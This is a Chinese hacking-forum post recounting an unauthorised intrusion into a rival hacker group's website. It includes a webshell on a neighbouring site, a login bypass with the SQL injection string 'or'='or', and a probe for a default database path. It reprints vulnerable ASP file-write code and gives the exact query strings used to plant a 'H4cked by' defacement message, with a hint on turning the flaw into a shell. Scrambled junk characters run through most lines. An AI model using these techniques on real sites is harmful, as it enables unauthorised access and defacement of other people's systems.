|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量! ^9 V/ |' r( L7 X1 V; L5 n& p
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
2 |0 k* }6 v4 M: S! P这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来0 L+ ^7 ?' F5 v$ j& C
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
; |3 K$ D) l1 b( [% I首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的5 j& p9 S: [' z8 \ t8 w6 W4 W
服务器应该防ARP,不过这还只是猜测9 |9 H0 p v5 g1 H9 W& A7 K/ g
云中鸡说先不搞C段,PZ一下再说7 t0 `, O7 h8 m- X+ y
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
# X7 `2 a/ ~7 w. {& v, l: ]一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
" J8 q% i3 s/ S) \3 b0 E h0 j这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell/ y9 q: `3 N$ P0 j$ {
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
5 W K" a$ z* W1 F+ W; R. u然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
b- h n/ Z s# ~5 u2 W3 k看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟; o) z5 ~$ q6 _0 B3 P* i
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
- m6 `: v. \; [无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~1 D+ e. I( X' p: ?; K `: s6 }; `
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
5 H3 a, K( I) ] t7 c4 [) y4 @打开一看,如图1所示。. M: Y S& T- j0 l
4 q3 ]7 E* m. U7 w) i. E; k1 n http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg6 d6 D5 w( m% g: o
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
* [1 H9 @5 b7 C+ @) w+ d
. e: k/ V1 C8 K( j( T$ f http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
$ O+ \; P. o& n太帅了,真YD!!8 H% ?" x+ n3 H/ f5 t7 Z
这个页面应该是一套个人主页程序,而且还挺炫的!
. e* ?; d! @$ M8 L0 e1 z这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。9 m' h: H0 u& o( {8 Q
0 m! n# v R8 H( U
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
6 Z+ k8 s9 ?1 d) W' o+ N! v嘿嘿,试着'or'='or'居然进去了!!如图4所示。3 w' d* b7 U+ d8 P! G6 U; s. n. F0 R
) |3 \8 R4 p9 |/ a
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg- b% q4 W0 h5 }0 E1 v: m' y5 }
经过半个多小时的摸索,还是没有发现可利用的地方。
* z, e9 _6 Y9 I' B2 C这下郁闷了,不管了,把这套程序下载下来看看吧. k I: S- f( h7 }
找了一会才知道这套程序叫做“V时代个人flash主页”
1 J- U5 {3 I. Y/ w到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用7 y2 M/ Q. f* M' ~' j E
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
# O0 o; [) x" n9 F' [% c' s+ G k返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]4 t a& k+ B+ ^ R! F: h
同样是找不到页面,真晕!再看看!0 _+ C. M3 K/ d5 c! b
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
- n4 Q/ H- V, ?马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!0 O# ^' _. V7 w. k
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
% I+ j h* y8 C- Y3 e+ ]希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:! t: h3 K' E3 B3 p' o; A5 o p; d
8 U& V: E: W' A7 i6 uvar a
- s( c% y ^+ yvar b
* |6 }6 j& p& ` E# ]3 Hvar tx
0 C- J' X. t1 y( `/ ovar clean! u* n A* M3 y8 K4 l/ c
a=Request("re"), g7 {1 c; c {' T# Y
clean=Request("clean")1 Z; r' Q- }3 }/ z3 Q
var jian="test.txt"" `* x+ o; W0 z
3 u" p% A& |% c, p: U9 F
if(clean==1){
' b& x- W! f% e. F" Wtx="&a="" z5 _+ d- B$ h! m
var fs2
2 g) B+ h, H3 J* dvar fs2=Server.CreateObject("Scripting.FileSystemObject")$ f6 {- @/ \8 k8 o2 l) R: k3 @
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)$ `' E! @# B, _" a+ o4 b5 k- y3 Y8 y" n& k
newdt.WriteLine("&a=")9 N; _5 d$ K2 R
newdt.close(). v! W+ f* @& W9 V
}+ b. Y( t- x, z# r2 P7 V
- Z/ f8 {2 `9 j! k. [
if(clean==0|clean==1){8 [) D4 W- R9 w4 D% t/ R) U w
tx=""# x' b9 }7 a9 L; T
var fso = Server.Createobject("Scripting.FileSystemObject"), }" C+ a1 ]" X, ^
var file = fso.OpenTextFile(Server.Mappath(jian))! w9 P) I8 _8 i6 i2 C
while (!file.AtEndOfStream){6 ^* [$ _! Z' m9 m% k
tx=file.ReadLine()
2 F/ L) U; U+ u3 t. ~Response.write (tx)
X4 e: Z* \1 T3 s: u, x}% u7 P6 R2 ?1 a2 M! L& R% n0 B5 \! Z
Response.write ("&")
; ?# F7 `- R P" [( J8 b; bfile.close()
. `( y0 c0 |( a2 X) H( c}0 G1 ^& n+ U9 i, ~
( d2 R6 r R! r: w0 N9 ^7 @7 qif(clean==2){
) L; X) [; U0 w) s& i Ytx=""9 `2 v( P* K6 F& b5 E' _0 s
var fso = Server.Createobject("Scripting.FileSystemObject")
$ w' B6 a8 }: x- i4 F7 I! ] L- G. Zvar file = fso.OpenTextFile(Server.Mappath(jian))" x6 y1 K& v8 O
1 R! R* {0 S8 O% e* Uvar fs2
( P7 g8 [! H# j) Hvar fs2=Server.CreateObject("Scripting.FileSystemObject")
- I q2 `' R9 Z( B4 Gvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
5 F; I' B1 e- V% F/ Z* E8 J& ^9 V" Y* @0 J$ e. R4 @- ~
1 H& m" U7 {. t. n. @/ m3 K* {& mwhile (!file.AtEndOfStream){
. n3 x4 |6 |! f$ Ftx=file.ReadLine(), H- Z! U5 D" q
Response.write (tx)}
9 y$ u! S, U+ }- D x! i. e6 t% o% w
0 Y4 K7 t, a- P. H0 z9 n1 ]3 [% FResponse.write (a+"&")) N7 j0 I9 ^- v$ h
newdt.WriteLine(a)
. Q1 E! _7 T9 `3 z' r5 ~* ^
# \' H2 e0 s) yfile.close()
8 `- i5 T) l5 h4 Q6 Onewdt.close()+ B5 ^+ G M) D6 a5 n
}
0 Y1 \8 P$ b" P' f/ d& C& X, l* c7 t3 _. ^4 F, v; N$ |$ a( M; v6 X }
4 ~$ O2 q5 ~# B ?# h% a- e
复制代码
' h: p/ k! t. v) u% \& \9 |) g这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”0 q( r3 l) X! \" C. T
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过” a$ r* k4 Y1 _/ a& G6 ]
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话! z! f6 B% a7 [* V2 Q
过程如图5、6所示。
* x. ^% h+ s, T2 a, G; \* h( B# V
) g% y) E* P ahttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
. E: M* R: L3 D) p! W5 S- K, D
0 P6 K8 R8 t' ~) e8 a& H5 R http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg+ b! E% W8 g1 @8 x7 q% |
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。 } O+ Q8 K3 r+ k
. }7 A0 M4 l. W+ j! x http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg C; O' ]& H: ^# P
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的1 B2 Z& h5 O2 G' o. U( Y" O
如果jian是经过request取值的话,同样也能搞到shell。) f& T" a. d- Z! l4 M0 U
这次只是装到了X,并没有拿到shell v9 a6 C/ ?, r' _
已经是凌晨了,跟云中J说了声就睡觉去鸟2 G. m5 Y+ y% m3 K1 D H( c
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
$ Y& M& S, N. n. N. ] H- o就到这里吧,没技术含量,纯粹装X,高手们见笑了
% h" H9 y: _0 ]& o% s另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
2 j3 S) S1 ~# F& |/ H自己学不到技术,却还在自欺欺人; ^$ d1 L0 I( S- S8 S
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~7 R: |0 |, }( ^1 C
4 \! m( J1 D+ H! g2 I$ D4 W |
|
发表于 2012-11-6 21:06:10
收藏
支持
反对